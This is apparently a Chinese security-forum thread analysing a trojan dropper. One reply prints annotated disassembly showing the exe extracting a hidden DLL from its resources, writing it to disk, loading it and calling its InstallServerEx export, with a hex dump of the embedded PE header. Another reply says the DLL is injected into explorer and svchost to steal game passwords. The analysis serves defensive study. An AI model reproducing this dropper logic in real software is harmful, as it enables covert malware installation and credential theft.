2 楼
安装一个dll文件..
重要的应该在这里面
3 楼
能告知是什么壳吗
4 楼
比较忙,简单看了一下,主exe无壳。
exe运行后释放隐藏在资源中的木马DLL,加载dll使其运作
.RIF1:00401230 ; =============== S U B R O U T I N E ?=====================================
.RIF1:00401230
.RIF1:00401230
// Dropper entry point: extracts a DLL from its own resources (sub_401360), loads it,
// calls its "InstallServerEx" export with the DLL's path, frees it and exits.
// 0x108 (264) bytes of stack are reserved for the path buffer LibFileName.
.RIF1:00401230 public start
.RIF1:00401230 start proc near
.RIF1:00401230
.RIF1:00401230 LibFileName= byte ptr -108h
.RIF1:00401230
.RIF1:00401230 sub esp, 108h
.RIF1:00401236 lea eax, [esp+108h+LibFileName]
.RIF1:0040123A push esi
.RIF1:0040123B push eax
.RIF1:0040123C call sub_401360
// Drops the winhtm.dll hidden in the resources (poster's note). The single cdecl
// argument is the LibFileName buffer, which sub_401360 fills with the dropped
// file's path — the same buffer is handed to LoadLibraryA below. sub_401360 itself
// is not in this post; only sub_401290, which it calls, is listed further down.
.RIF1:0040123C
.RIF1:00401241 add esp, 4
.RIF1:00401244 test eax, eax
.RIF1:00401246 jz short loc_40127A
// Drop failed (eax == 0): go straight to ExitProcess.
.RIF1:00401246
.RIF1:00401248 lea ecx, [esp+10Ch+LibFileName]
// +10Ch rather than +108h because esi was pushed above.
.RIF1:0040124C push ecx ; lpLibFileName
.RIF1:0040124D call LoadLibraryA
// Load the trojan DLL (winhtm.dll) from the path written by sub_401360.
.RIF1:0040124D
.RIF1:00401253 mov esi, eax
.RIF1:00401255 test esi, esi
.RIF1:00401257 jz short loc_40127A
// LoadLibraryA returned NULL: exit without FreeLibrary.
.RIF1:00401257
.RIF1:00401259 push offset ProcName ; "InstallServerEx"
.RIF1:0040125E push esi ; hModule
.RIF1:0040125F call GetProcAddress
// Resolve the trojan DLL's InstallServerEx export.
.RIF1:0040125F
.RIF1:00401265 test eax, eax
.RIF1:00401267 jz short loc_401273
// Export not found: still FreeLibrary the module (esi is a valid handle here).
.RIF1:00401267
.RIF1:00401269 lea edx, [esp+10Ch+LibFileName]
.RIF1:0040126D push edx
.RIF1:0040126E call eax
// Call InstallServerEx(LibFileName) — this is where the trojan starts working.
// How the trojan itself operates lives in winhtm.dll; analyse that separately.
// The add esp,4 below shows the export is cdecl with this one argument.
.RIF1:0040126E
.RIF1:00401270 add esp, 4
.RIF1:00401273
.RIF1:00401273 loc_401273: ; CODE XREF: start+37j
.RIF1:00401273 push esi ; hLibModule
.RIF1:00401274 call FreeLibrary
// Once the trojan is installed the dropper can release winhtm.dll.
.RIF1:00401274
.RIF1:0040127A
.RIF1:0040127A loc_40127A: ; CODE XREF: start+16j
.RIF1:0040127A ; start+27j
.RIF1:0040127A push 0 ; uExitCode
.RIF1:0040127C call ExitProcess
// Game over: every path (success or any failure) exits with code 0, so the
// dropper never reports an error.
.RIF1:0040127C
.RIF1:00401282 xor eax, eax
.RIF1:00401284 pop esi
.RIF1:00401285 add esp, 108h
.RIF1:0040128B retn 10h
// Dead code: ExitProcess does not return. The retn 10h looks like a
// compiler-generated 4-argument (WinMain-style) epilogue — not verified here.
.RIF1:0040128B
.RIF1:0040128B start endp
你可以用16进制编辑工具打开此文件,偏移00002000处就是捆绑的winhtm.dll
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00002000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ?........?..
00002010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@.......
00002020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00002030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?..
00002040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ..?.???L?Th
00002050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
00002060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
00002070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
.RIF1:0040143C lea ecx, [esp+220h+FileName]
.RIF1:00401440 push ecx ; lpFileName
.RIF1:00401441 call sub_401290
.RIF1:00401290 ; =============== S U B R O U T I N E ?=====================================
.RIF1:00401290
.RIF1:00401290
.RIF1:00401290 ; int __cdecl sub_401290(LPCSTR lpFileName)
// Writes the embedded DLL to lpFileName. Returns 1 on success, 0 if the resource is
// not found or CreateFileA fails. The output file is the resource body followed by a
// 0x6F4-byte block taken from the dropper's own memory (see the two WriteFile calls).
// NOTE: the listing jumps from 004012C8 to 004012DE; the instructions in between
// (where ebx is set — presumably the LockResource pointer, given the poster's
// "resource loaded at 00402000" note) are not shown in this post.
.RIF1:00401290 sub_401290 proc near ; CODE XREF: sub_401360+E1p
.RIF1:00401290
.RIF1:00401290 NumberOfBytesWritten= dword ptr -4
.RIF1:00401290 lpFileName= dword ptr 4
.RIF1:00401290
.RIF1:00401290 push ecx
// Reserves the 4-byte NumberOfBytesWritten slot (the pushed ecx value is never read).
.RIF1:00401291 push ebx
.RIF1:00401292 push ebp
.RIF1:00401293 push esi
.RIF1:00401294 push edi
.RIF1:00401295 mov edi, GetModuleHandleA
// edi caches the GetModuleHandleA import for the three calls below.
.RIF1:0040129B push 100h ; lpType
.RIF1:004012A0 push 64h ; lpName
.RIF1:004012A2 push 0 ; lpModuleName
.RIF1:004012A4 call edi ; GetModuleHandleA
// GetModuleHandleA(NULL) = the dropper's own image base.
.RIF1:004012A4
.RIF1:004012A6 push eax ; hModule
.RIF1:004012A7 call FindResourceA
// FindResourceA(self, MAKEINTRESOURCE(0x64), MAKEINTRESOURCE(0x100)): the payload is
// filed under integer ids — name 100, type 256 (not one of the predefined RT_* ids).
.RIF1:004012A7
.RIF1:004012AD mov esi, eax
// esi = hResInfo
.RIF1:004012AF push esi ; hResInfo
.RIF1:004012B0 push 0 ; lpModuleName
.RIF1:004012B2 call edi ; GetModuleHandleA
.RIF1:004012B2
.RIF1:004012B4 push eax ; hModule
.RIF1:004012B5 call LoadResource
// Resource is loaded into memory at 00402000 (poster's note). That would line up
// with the 00002000 file offset quoted above only if the section is mapped 1:1 —
// not verified here.
.RIF1:004012B5
.RIF1:004012BB test esi, esi
.RIF1:004012BD mov ebp, eax
.RIF1:004012BF jnz short loc_4012C9
// Only hResInfo (esi) is checked; a NULL return from LoadResource (ebp) is not.
// loc_4012C9 is in the part of the listing omitted below.
.RIF1:004012BF
.RIF1:004012C1 pop edi
.RIF1:004012C2 pop esi
.RIF1:004012C3 pop ebp
.RIF1:004012C4 xor eax, eax
.RIF1:004012C6 pop ebx
.RIF1:004012C7 pop ecx
.RIF1:004012C8 retn
// Failure path: return 0.
.RIF1:004012C8
// --- 004012C9..004012DD not included in the post ---
.RIF1:004012DE ; ---------------------------------------------------------------------------
.RIF1:004012DE
.RIF1:004012DE loc_4012DE: ; CODE XREF: sub_401290+44j
.RIF1:004012DE push esi ; hResInfo
.RIF1:004012DF push 0 ; lpModuleName
.RIF1:004012E1 call edi ; GetModuleHandleA
.RIF1:004012E1
.RIF1:004012E3 push eax ; hModule
.RIF1:004012E4 call SizeofResource
.RIF1:004012E4
.RIF1:004012EA mov ebp, eax
// ebp = resource size; becomes nNumberOfBytesToWrite of the first WriteFile.
.RIF1:004012EC mov eax, dword_401000
.RIF1:004012F1 lea edi, [eax+ebx]
// edi = ebx + dword_401000: a second block located relative to the resource buffer
// (ebx comes from the omitted span). 0x6F4 bytes of it are appended to the file below.
.RIF1:004012F4 call sub_4011C0
// sub_4011C0 is not shown. Whatever it leaves in eax is stored into that block at
// +1C2h (mov [edi+1C2h], eax) just before CreateFileA, i.e. the appended tail is
// patched at runtime — looks like a configuration field; unconfirmed.
.RIF1:004012F4
.RIF1:004012F9 mov ecx, [esp+14h+lpFileName]
.RIF1:004012FD push 0 ; hTemplateFile
.RIF1:004012FF push 80h ; dwFlagsAndAttributes
.RIF1:00401304 push 2 ; dwCreationDisposition
.RIF1:00401306 push 0 ; lpSecurityAttributes
.RIF1:00401308 push 0 ; dwShareMode
.RIF1:0040130A push 40000000h ; dwDesiredAccess
.RIF1:0040130F push ecx ; lpFileName
.RIF1:00401310 mov [edi+1C2h], eax
.RIF1:00401316 call CreateFileA
// CreateFileA(lpFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL).
// Per the poster this produces, in the temp directory, a dll with the same name as the
// main program; the path itself comes from the caller (sub_401360), not this function.
.RIF1:00401316
.RIF1:0040131C mov esi, eax
.RIF1:0040131E cmp esi, 0FFFFFFFFh
.RIF1:00401321 jnz short loc_40132B
// INVALID_HANDLE_VALUE: return 0.
.RIF1:00401321
.RIF1:00401323 pop edi
.RIF1:00401324 pop esi
.RIF1:00401325 pop ebp
.RIF1:00401326 xor eax, eax
.RIF1:00401328 pop ebx
.RIF1:00401329 pop ecx
.RIF1:0040132A retn
.RIF1:0040132A
.RIF1:0040132B ; ---------------------------------------------------------------------------
.RIF1:0040132B
.RIF1:0040132B loc_40132B: ; CODE XREF: sub_401290+91j
.RIF1:0040132B lea edx, [esp+14h+NumberOfBytesWritten]
.RIF1:0040132F push 0 ; lpOverlapped
.RIF1:00401331 push edx ; lpNumberOfBytesWritten
.RIF1:00401332 push ebp ; nNumberOfBytesToWrite
.RIF1:00401333 push ebx ; lpBuffer
.RIF1:00401334 mov ebx, WriteFile
.RIF1:0040133A push esi ; hFile
.RIF1:0040133B call ebx ; WriteFile
// First write: the whole resource (buffer ebx, ebp bytes). Return value is ignored.
.RIF1:0040133B
.RIF1:0040133D lea eax, [esp+14h+NumberOfBytesWritten]
.RIF1:00401341 push 0 ; lpOverlapped
.RIF1:00401343 push eax ; lpNumberOfBytesWritten
.RIF1:00401344 push 6F4h ; nNumberOfBytesToWrite
.RIF1:00401349 push edi ; lpBuffer
.RIF1:0040134A push esi ; hFile
.RIF1:0040134B call ebx ; WriteFile
// Second write: 0x6F4 (1780) bytes from edi appended after the resource. Also unchecked.
.RIF1:0040134B
.RIF1:0040134D push esi ; hObject
.RIF1:0040134E call CloseHandle
.RIF1:0040134E
.RIF1:00401354 pop edi
.RIF1:00401355 pop esi
.RIF1:00401356 pop ebp
.RIF1:00401357 mov eax, 1
.RIF1:0040135C pop ebx
.RIF1:0040135D pop ecx
.RIF1:0040135E retn
// Success: return 1.
.RIF1:0040135E
.RIF1:0040135E sub_401290 endp
5 楼
谢fly!
6 楼
程序运行以后,会在TEMP目录里生成TEST1.DLL这个文件,然后把TEST1.DLL远程注入到EXPLORER,SVCHOST的进程中
应该是个偷天堂密码的木马!
7 楼
fly分析得很仔细呀,我菜鸟都看懂了
8 楼
楼上的好熟啊